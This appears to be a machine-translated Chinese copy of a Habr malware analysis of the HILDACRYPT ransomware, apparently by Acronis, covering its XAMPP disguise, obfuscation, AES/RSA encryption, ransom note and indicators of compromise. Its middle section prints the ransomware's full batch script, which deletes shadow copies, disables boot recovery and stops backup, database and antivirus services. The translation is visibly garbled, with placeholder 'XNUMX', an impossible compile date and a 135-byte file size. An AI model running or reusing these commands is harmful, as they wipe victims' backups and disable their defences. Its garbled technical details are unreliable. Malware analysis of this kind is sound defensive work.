HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

你好,哈布尔! 我们再次讨论勒索软件类别中最新版本的恶意软件。 HILDACRYPT 是一种新型勒索软件,是 Hilda 家族成员于 2019 年 XNUMX 月发现的,以用于分发该软件的 Netflix 卡通片命名。 今天我们来了解一下这个更新后的勒索软件病毒的技术特征。

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

在 Hilda 勒索软件的第一个版本中,有一个指向 Youtube 上发布的勒索软件的链接 拖车 赎金信中包含卡通系列。 HILDACRYPT 伪装成合法的 XAMPP 安装程序,这是一个易于安装的 Apache 发行版,其中包括 MariaDB、PHP 和 Perl。 同时,cryptlocker 有一个不同的文件名 - xamp.txt。 此外,勒索软件文件没有电子签名。

静态分析

该勒索软件包含在为 MS Windows 编写的 PE32 .NET 文件中。 它的大小是 135 字节。 主程序代码和防御程序代码都是用C#编写的。 根据编译日期和时间戳,该二进制文件创建于 168 年 14 月 2019 日。

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

据 Detect It Easy 介绍,该勒索软件是使用 Confuser 和 ConfuserEx 进行归档的,但这些混淆器与之前相同,只是 ConfuserEx 是 Confuser 的后继者,因此它们的代码签名相似。

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

HILDACRYPT 确实是与 ConfuserEx 一起打包的。

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

攻击向量

最有可能的是,勒索软件是在一个网络编程网站上发现的,伪装成合法的 XAMPP 程序。

整个感染链可见 app.any.run 沙箱.

混淆

勒索软件字符串以加密形式存储。 启动后,HILDACRYPT 使用 Base64 和 AES-256-CBC 对其进行解密。

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

安装

首先,勒索软件在%AppDataRoaming%中创建一个文件夹,其中随机生成GUID(全局唯一标识符)参数。 通过将 bat 文件添加到此位置,勒索软件病毒会使用 cmd.exe 启动它:

cmd.exe /c JKfgkgj3hjgfhjka.bat & 退出

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案
然后它开始执行批处理脚本以禁用系统功能或服务。

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

该脚本包含一长串命令,用于销毁卷影副本、禁用 SQL 服务器、备份和防病毒解决方案。

例如,它尝试停止 Acronis Backup 服务失败。 此外,它还攻击以下供应商的备份系统和防病毒解决方案:Veeam、Sophos、卡巴斯基、McAfee 等。

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

一旦禁用上述服务和进程,cryptlocker 就会使用 tasklist 命令收集有关所有正在运行的进程的信息,以确保所有必要的服务都已关闭。
任务列表 v/fo csv

该命令显示正在运行的进程的详细列表,其中的元素由“,”符号分隔。
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

检查后,勒索软件开始加密过程。

加密

文件加密

HILDACRYPT 会检查硬盘驱动器中所有找到的内容(Recycle.Bin 和 Reference AssembliesMicrosoft 文件夹除外)。 后者包含 .Net 应用程序的关键 dll、pdb 等文件,这些文件可能会影响勒索软件的运行。 要搜索将加密的文件,请使用以下扩展名列表:

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

该勒索软件使用 AES-256-CBC 算法来加密用户文件。 密钥大小为 256 位,初始化向量 (IV) 大小为 16 字节。

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

在下面的截图中,byte_2和byte_1的值是使用GetBytes()随机获得的。

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

关键

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

在和

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

加密文件的扩展名为 HCY!...这是加密文件的示例。 上面提到的密钥和 IV 是为此文件创建的。

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

密钥加密

Cryptolocker 将生成的 AES 密钥存储在加密文件中。 加密文件的第一部分有一个标头,其中包含 XML 格式的 HILDACRYPT、KEY、IV、FileLen 等数据,如下所示:

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

AES 和 IV 密钥加密使用 RSA-2048 完成,编码使用 Base64 完成。 RSA 公钥以 XML 格式的加密字符串之一存储在 cryptolocker 主体中。

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

RSA 公钥用于加密 AES 文件密钥。 RSA 公钥采用 Base64 编码,由模数和公共指数 65537 组成。解密需要攻击者拥有的 RSA 私钥。

RSA 加密后,AES 密钥使用存储在加密文件中的 Base64 进行编码。

勒索信息

加密完成后,HILDACRYPT 会将 html 文件写入加密文件的文件夹中。 勒索软件通知包含两个电子邮件地址,受害者可以通过这些地址联系攻击者。

HILDACRYPT:新的勒索软件攻击备份系统和防病毒解决方案

勒索通知中还包含这样一句话:“没有萝莉是安全的;)”——指的是日本禁止出现小女孩外观的动漫和漫画人物。

结论

新勒索软件家族HILDACRYPT已发布新版本。 加密模型可防止受害者解密勒索软件加密的文件。 Cryptolocker 使用主动保护方法来禁用与备份系统和防病毒解决方案相关的保护服务。 HILDACRYPT 的作者是 Netflix 上播放的动画连续剧《希尔达》的粉丝,该节目前一版本的买断信中包含该预告片的链接。

像往常一样 Acronis备份 и 的Acronis True图片 可以保护您的计算机免受 HILDACRYPT 勒索软件的侵害,提供商有能力通过以下方式保护其客户 Acronis备份云。 这些解决方案包括以下事实,确保了保护 网络安全 不仅包括备份,还包括我们的集成安全系统 安克诺斯主动防护 - 由机器学习模型提供支持并基于行为启发法,这项技术能够像其他技术一样应对零日勒索软件的威胁。

妥协指标

文件扩展名 HCY!
HILDACRYPTReadMe.html
xamp.exe 带有一个字母“p”并且没有数字签名
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

来源: habr.com

添加评论